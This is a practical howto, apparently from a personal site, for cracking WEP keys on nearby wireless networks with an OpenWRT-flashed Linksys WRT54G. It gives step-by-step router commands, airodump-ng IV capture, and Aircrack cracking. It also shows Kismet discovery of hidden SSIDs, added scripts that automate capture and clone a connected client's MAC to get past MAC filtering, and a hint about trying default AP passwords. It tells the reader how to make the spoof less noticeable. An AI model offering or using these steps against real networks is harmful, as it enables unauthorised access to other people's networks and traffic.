This is a howto for hacking wireless networks secured with 64 or 128 bit WEP keys, discovering hidden SSIDs and spoofing (faking) MAC addresses with the Linksys WRT54G and OpenWRT firmware. I also tried to give background info where needed.
When To Use This Howto
You should use this howto if you fit the following profile:
The Game Plan
WEP is cracked by collecting the data packets an access point and its clients send out: each one carries a 24-bit initialisation vector (IV) in the clear, and every IV leaks a small amount of information about the WEP key used. Collect enough IVs and Aircrack can recover the key. Note that a "64 bit" WEP key is really a 40-bit secret plus the 24-bit IV, and a "128 bit" key is a 104-bit secret plus the IV. There's no way of telling from the traffic whether a key is 64 or 128 bit, so you must check for both lengths. Start with 64 bit, as this will be found faster (a few minutes).
Airodump-ng is the crucial program that will run on the router to listen to APs; it writes the IVs it sniffs to IVS files. These files can then be analysed by Aircrack-ng on Windows, or by aircrack-ng on the WRT itself, but because of the lack of storage on the WRT I used Windows to do the cracking. Also, my Windows CPU is faster than the one in the WRT (the WRT runs on a 200 MHz CPU).
To get airodump working, we're going to install OpenWRT on the router and then install aircrack-ng and the Kismet client and server. Kismet is useful for unveiling hidden SSIDs and client MAC addresses. The router must be set up in client mode so it can listen to networks.
The following packages on OpenWRT will be installed
Flash the WRT54G
First we're going to flash the WRT. Make sure you have a LAN connection to the WRT54G. Use the exact firmware mentioned (OpenWRT-wrt54g-jffs2.bin). You can flash the router from the web interface offered by the current firmware on the router. I flashed to OpenWRT from the web interface of alternative firmware ported from Sveasoft. You can also use tftp to flash the router.
Once done, the IP address of the router should be the same as it was before the flash, and you can reach it through the OpenWRT web interface. After logging in for the first time you must set a password and reboot. After the reboot the router has formatted the filesystem into read/write (jffs2) mode. You should then also be able to log in over SSH and SCP with root as username combined with your password.
Set up the WRT54G in client mode
This section is copied from this site and edited where needed.
Remove the Firewall
The default firewall on OpenWRT provides some basic inbound firewalling and NAT on the WAN interface. I turned it off to prevent unwanted blocking in any way. Bear in mind that with it disabled every service on the WRT (web interface, SSH, telnet) is reachable from the WAN port and, once the box is in client mode, from whatever wireless network it joins, so the root password is all that protects it. Removing the execute bit stops the init script from running at boot:
chmod 644 /etc/init.d/S45firewall
Optionally, you can also set the hostname of the WRT:
nvram set wan_hostname=MyWrt
Setup WAN Port
The WAN Port is the port at the back of the WRT that has Internet written above the port. It's a port like the rest, but it's in a separate VLAN.
At this point, I configured the WAN port with a valid IP address on my home network, to allow me to complete the configuration, and to give the WRT internet access via my network (for installing additional packages).
To configure the WAN (vlan1 interface) port, I used the following:
nvram set wan_proto=static
nvram set wan_ipaddr=192.168.3.2
nvram set wan_netmask=255.255.255.0
I wanted to avoid using a 192.168.0.x IP address, as this might conflict with a gateway I could possibly obtain from a DHCP server on my connected Windows Box from a cracked AP later on.
On my Windows Vista Box I set up ICS and changed the IP address of my LAN adapter to 192.168.3.1
Set a default gateway and DNS server:
nvram set wan_gateway=192.168.3.1
nvram set wan_dns=192.168.3.1
Commit the changes, and reboot:
nvram commit
reboot
The WAN port was then connected to my network card, and I could telnet to the WRT on the IP address I had given to the WAN interface.
The default OpenWrt configuration has the wireless interface bridged with the LAN ports. To allow routing and firewalling between these interfaces, the bridge needs to be removed. At the same time, we'll also rename the LAN ports to vlan0:
nvram set lan_ifname=vlan0
nvram unset lan_ifnames
nvram is the tool used to read and change the settings that control the router. Use this to see all the settings available:
nvram show | more
Setup LAN Interface
Now that the bridge has been removed, the LAN interface (vlan0) can be configured with a static IP address:
nvram set lan_proto=static
nvram set lan_ipaddr=192.168.3.3
nvram set lan_netmask=255.255.255.0
Setup Wireless Interface
Similarly, the wireless interface (eth1) can be configured:
nvram set wifi_ifname=eth1
nvram set wifi_proto=static
nvram set wifi_ipaddr=192.168.3.100
nvram set wifi_netmask=255.255.255.0
nvram set wifi_gateway=192.168.3.1
nvram set wifi_dns=192.168.3.1
Rather than relying on the WRT to decide which antenna socket to use, we'll force it to only use the main antenna socket, located next to the power socket (-1=auto, 0=main, 1=aux, 3=diversity):
nvram set wl0_antdiv=0
Note that the antenna designations have changed in the various versions of the WRT. For earlier WRT54G/WRT54GS models, -1=auto, 0=main (next to power socket), 1=aux (next to reset button), 3=diversity.
Starting with WRT54G v2.0 and WRT54GS v1.1 these are reversed: 0=main (next to reset button) and 1=aux (next to power jack).
Wireless Client Configuration
Set Client Mode
The wireless mode of the WRT can be set to ap (access point mode), sta (station/client mode), or wet (wireless ethernet bridge, i.e. bridged client). As we're using it as a routed client, the mode gets set as follows:
nvram set wl0_mode=sta
When using sta or wet mode, you also need to specify if ad-hoc or infrastructure/managed mode is being used, with 0 used to specify ad-hoc mode, and 1 for managed mode:
nvram set wl0_infra=1
Set the ESSID
The ESSID of the wireless network to connect to needs to be specified:
nvram set wl0_ssid=SGNet
Save and Reboot
Before continuing, commit all changes, and reboot the WRT:
nvram commit
reboot
After the WRT has rebooted, verify that the configuration changes have been successfully applied (nvram get wl0_mode should print sta, and so on for the other settings). I connected to a normal LAN port from this point on instead of the WAN port.
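The nvram steps above are easy to mistype and there is no feedback until after the reboot. The script below is an added example (not part of the original howto) that writes the whole routed-client configuration from the preceding sections in one go and then compares every key against what nvram actually holds. The network values default to the ones used in this howto; NVRAM can be pointed at a stand-in command to try the script somewhere other than the router.

```shell
#!/bin/sh
# Added example: apply the routed-client configuration from this howto and
# verify it. Values are the howto's; override them in the environment.
# NVRAM may be set to a stub command for a dry run off the router.

NVRAM="${NVRAM:-nvram}"

ESSID="${ESSID:-SGNet}"
WAN_IP="${WAN_IP:-192.168.3.2}"
LAN_IP="${LAN_IP:-192.168.3.3}"
WIFI_IP="${WIFI_IP:-192.168.3.100}"
GATEWAY="${GATEWAY:-192.168.3.1}"
NETMASK="${NETMASK:-255.255.255.0}"

# One "key=value" per line, in the order of the walkthrough.
client_mode_settings() {
    cat <<EOF
wan_proto=static
wan_ipaddr=$WAN_IP
wan_netmask=$NETMASK
wan_gateway=$GATEWAY
wan_dns=$GATEWAY
lan_ifname=vlan0
lan_proto=static
lan_ipaddr=$LAN_IP
lan_netmask=$NETMASK
wifi_ifname=eth1
wifi_proto=static
wifi_ipaddr=$WIFI_IP
wifi_netmask=$NETMASK
wifi_gateway=$GATEWAY
wifi_dns=$GATEWAY
wl0_antdiv=0
wl0_mode=sta
wl0_infra=1
wl0_ssid=$ESSID
EOF
}

# Write every setting; lan_ifnames must be unset so the LAN/wireless bridge goes away.
apply_settings() {
    while IFS= read -r kv; do
        "$NVRAM" set "$kv" || return 1
    done <<EOF
$(client_mode_settings)
EOF
    "$NVRAM" unset lan_ifnames
}

# Print one line per mismatching key; prints nothing when everything matches.
# Run this after the reboot to confirm the configuration really took.
verify_settings() {
    while IFS= read -r kv; do
        key=${kv%%=*}
        want=${kv#*=}
        got=$("$NVRAM" get "$key")
        [ "$got" = "$want" ] || echo "$key: got '$got' want '$want'"
    done <<EOF
$(client_mode_settings)
EOF
}

# Exit status 0 when verify_settings reports no mismatches.
settings_ok() {
    [ -z "$(verify_settings)" ]
}

case "${1:-}" in
    apply)  apply_settings && "$NVRAM" commit && echo "committed; now reboot" ;;
    verify) settings_ok && echo "all settings applied" ;;
esac
```

Run it as `sh clientmode.sh apply`, reboot, then `sh clientmode.sh verify`; any key that did not survive the commit is printed with the value found and the value expected.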
Testing Wireless Connectivity
Test your connection with a utility called wl. Check if it's already installed; otherwise install wl using:
ipkg install wl
ipkg is the tool to download packages from online repositories. If you don't have an internet connection on your WRT, you can upload the packages manually to your router using WinSCP. If ipkg can't find a package, make sure this source line is present in /etc/ipkg.conf:
src whiterussian http://downloads.openwrt.org/backports/rc5
Once installed, you can use wl to list all the wireless networks that are visible to your WRT, using
wl scan; sleep 1; wl scanresults
Assuming there is at least one wireless network visible, you should see output similar to
Mode: Managed RSSI: -83 dBm noise: -94 dBm Channel: 13
BSSID: 00:0C:F1:96:C9:BD Capability: ESS
Supported Rates: [ 1(b) 2(b) 5.5(b) 11(b) ]
You can also use wl to join any wireless network, using
wl join SGNet
Assuming your WRT can access the internet, get it to update its ipkg database, and then retrieve a list of the available packages:
ipkg update
ipkg list
I updated the existing packages; it consumed some extra space on the router, and I'm not sure if it was necessary.
Note: if you type
ipkg list_installed
you can see what packages are currently installed.
Re-configure WAN Port
The WAN port isn't required any more, and hence was reconfigured for on-site administration, to provide a way to locally access the WRT for configuration if required.
nvram set wan_proto=static
nvram set wan_ipaddr=192.168.1.1
nvram set wan_netmask=255.255.255.0
nvram unset wan_gateway
nvram unset wan_dns
Save and Test
These changes must be committed, and the WRT rebooted to test the new configuration:
nvram commit
reboot
Install the cracking tools
Now install aircrack-ng and the Kismet client and server onto your WRT. Dependencies are installed automatically if needed.
ipkg install aircrack-ng
ipkg install kismet-server
ipkg install kismet-client
Check this if the packages are not found.
The OpenWRT /tmp directory has 8 MB available for IV files, and it lives in RAM, so anything still in it is lost on a reboot or power cut. That's not too much, so it would be nice to mount a Windows share in OpenWRT. Unfortunately that did not work out for me. Here's what I tried:
The good news is that I found out that the 8 MB of storage is not too bad after all. If you download the IVS file from the /tmp directory every day or two, and delete it after that, airodump won't run out of storage needed for the IVS files.
Running aircrack programs
From the aircrack-ng package on OpenWRT we're going to use just one program: airodump-ng.
Start this program by typing:
wl monitor 1
airodump-ng --ivs --write wep out 7 prism0
Airodump doesn't seem to listen to all the options mentioned above very well. The options given should force airodump to monitor just wireless channel 7; in my case, it monitored every channel. Airodump will place the ivs output file in the /tmp directory.
The reason is that airodump-ng hops across all channels unless a channel is given with its --channel option; the bare "out 7" on the command line above is evidently not taken as one. To stay on channel 7, run airodump-ng --ivs --write wep --channel 7 prism0 instead. The output files (wep-01.ivs and a wep-01.txt with the APs and clients seen) are written relative to the current working directory, so cd /tmp before starting it.
You should see an output window like this (I anonymized the data):
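Two things go wrong in practice with the capture described above and in the storage section: airodump-ng dies when the SSH session that started it closes, and nobody notices /tmp filling up until the IVS file stops growing. The script below is an added example (not part of the original howto) that starts the capture detached, with the channel passed via --channel, and reports when the IVS files have grown past a limit so they can be copied off and deleted. The interface name, prefix and 6 MB limit are assumptions to adjust for your box.

```shell
#!/bin/sh
# Added example: run the airodump-ng capture in the background and watch the
# space its IVS files take in the 8 MB /tmp. Names and limit are assumptions.

IFACE="${IFACE:-prism0}"        # monitor interface created by "wl monitor 1"
CHANNEL="${CHANNEL:-7}"
PREFIX="${PREFIX:-/tmp/wep}"    # airodump-ng writes /tmp/wep-01.ivs, wep-01.txt, ...
LIMIT_KB="${LIMIT_KB:-6144}"    # warn once the IVS files pass 6 MB of the 8 MB

# Total size in kB (rounded up per file) of every *.ivs file in a directory; 0 if none.
ivs_total_kb() {
    dir=$1
    total=0
    for f in "$dir"/*.ivs; do
        [ -f "$f" ] || continue
        bytes=$(wc -c < "$f")
        total=$(( total + (bytes + 1023) / 1024 ))
    done
    echo "$total"
}

# Exit 0 when the IVS files in $1 have reached $2 kB and should be moved off the router.
needs_rotation() {
    [ "$(ivs_total_kb "$1")" -ge "$2" ]
}

# Put the radio in monitor mode and run airodump-ng detached from this shell,
# so it keeps capturing after the SSH session ends. Output goes to a log file.
start_capture() {
    wl monitor 1
    nohup airodump-ng --ivs --write "$PREFIX" --channel "$CHANNEL" "$IFACE" \
        > /tmp/airodump.log 2>&1 &
    echo "airodump-ng started, pid $!"
}

# Stop the capture so the current IVS file is closed before it is copied.
stop_capture() {
    killall airodump-ng 2>/dev/null
}

case "${1:-}" in
    start) start_capture ;;
    stop)  stop_capture ;;
    check)
        dir=$(dirname "$PREFIX")
        echo "IVS files in $dir: $(ivs_total_kb "$dir") kB (limit $LIMIT_KB kB)"
        if needs_rotation "$dir" "$LIMIT_KB"; then
            echo "stop the capture, copy the .ivs files to the cracking machine, delete them, restart"
        fi ;;
esac
```

Use `sh capture.sh start` once and `sh capture.sh check` whenever you log in; when it tells you to rotate, run `sh capture.sh stop`, copy the files with scp or WinSCP, delete them from /tmp and start again.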
Amount of IV needed
According to different fora, and the aircrack tool, about 250,000 packets are needed for a 64 bit WEP key. I was able to crack two networks with less than 100,000 IVs. Guess I was lucky. I read on different fora that you need about 1 million IVs to crack a 128 bit key. Haven't tested that yet. I captured between 2,000 and 5,000 IVs an hour from WEP secured networks. So, you'll need anywhere between 2 and 7 days to crack a 64 bit WEP key without packet injection.
Crack the key with the help of the IV files
I used WinSCP to transport the IVS file to my Windows machine. After that I restarted airodump and got rid of the old IVS file on the WRT54G to prevent running out of space. In my case I needed to do this every 48 hours.
Aircrack-ng 0.9.x GUI in Windows offers the possibility to assemble input from many IVS and CAP/dump files.
After retrieving IVS files, follow these steps:
If you're lucky you now have the key and you can log in to the network. Cracking a 64 bit key should only take a few minutes. I can't give you data on 128 bit.
Note: if I start Aircrack, my wireless network loses its connection, quite odd.
Mac address spoofing and discovering hidden SSIDs
But what if you have the WEP key, and you still cannot log in to the network? The AP may be filtering on MAC address, so try changing your MAC address to that of a client that's already connected. In the .txt file airodump writes alongside the IVS file you can find the MAC addresses of the clients seen talking to each AP.
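Picking the client MACs out of airodump's .txt file by hand is error-prone, and the text above gives no command for the spoofing itself. The following is an added example (not part of the original howto): it lists the stations airodump-ng recorded as associated with a given BSSID and clones one of them onto the wireless interface with busybox ifconfig. The .txt layout it assumes is the comma-separated one airodump-ng writes (an access-point table, a blank line, then a station table whose header starts with "Station MAC" and whose sixth column is the BSSID); the sample data embedded below is constructed for the example, reusing the BSSID and ESSID shown earlier on this page.

```shell
#!/bin/sh
# Added example: list the clients airodump-ng saw on one AP and clone a MAC.
# Assumes the comma-separated .txt layout airodump-ng writes; sample data is constructed.

# stations_for BSSID [FILE]: print the station MACs associated with BSSID.
# Reads FILE, or stdin when no file is given. Matching is case-insensitive.
stations_for() {
    want=$(printf '%s' "$1" | tr 'a-f' 'A-F')
    awk -F',' -v want="$want" '
        /^Station MAC/ { in_stations = 1; next }   # station table starts here
        in_stations && NF >= 6 {
            mac = $1; ap = $6
            gsub(/^ +| +$/, "", mac); gsub(/^ +| +$/, "", ap)
            if (toupper(ap) == want) print mac    # skips "(not associated)"
        }' ${2:+"$2"}
}

# spoof_mac IFACE MAC: take the interface down, set the cloned address, bring
# it back up and show the result. eth1 is the radio on the WRT54G.
spoof_mac() {
    iface=$1
    mac=$2
    ifconfig "$iface" down &&
    ifconfig "$iface" hw ether "$mac" &&
    ifconfig "$iface" up &&
    ifconfig "$iface" | grep -i "$mac"
}

# Constructed sample in airodump-ng's .txt layout, so this runs off the router.
SAMPLE_TXT=$(cat <<'EOF'
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Power, # beacons, # data, LAN IP, ESSID
00:0C:F1:96:C9:BD, 2007-11-02 20:01:10, 2007-11-02 23:40:02,  7,  54, WEP, -83, 1203, 4412,   0.  0.  0.  0, SGNet

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:16:CE:2A:11:42, 2007-11-02 20:02:31, 2007-11-02 23:39:58, -80, 3120, 00:0C:F1:96:C9:BD, SGNet
00:13:CE:88:90:1F, 2007-11-02 21:15:05, 2007-11-02 21:15:09, -88,    4, (not associated), linksys
00:0E:35:7B:C0:D2, 2007-11-02 22:00:41, 2007-11-02 23:38:12, -85,  960, 00:0C:F1:96:C9:BD, SGNet
EOF
)

# Usage on the router, with the real file:
#   stations_for 00:0c:f1:96:c9:bd /tmp/wep-01.txt
#   spoof_mac eth1 00:16:CE:2A:11:42
# Offline, against the constructed sample:
#   printf '%s\n' "$SAMPLE_TXT" | stations_for 00:0c:f1:96:c9:bd
```

Prefer a client that airodump last saw a while ago: while the real owner is still on the air, two stations share one address and both connections misbehave, which is also what makes the spoof noticeable.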
Kismet can help you get more information.
Now: open an SSH shell with PuTTY and type:
kismet_server
Open another SSH shell and type:
kismet_client
Use the h command after starting up the client to see all the options. If the server has run for a little while you'll see hidden SSIDs showing up.
The cool thing is that Kismet will also tell you the brand of the AP (it looks up the vendor part of the MAC address). Now you can check whether the default password has been left unchanged, which was the case in three APs near me.
Cool additional resources
Aircrack video. Mind you, not all steps shown are the same as the ones described here.
RemotFileSystemHowTo. Didn't work out for me, but it should be possible.
Cygwin NFS Server HowTo. Again, good tutorial, but didn't work out for me.
That’s all there is to it! Hope you find my information useful!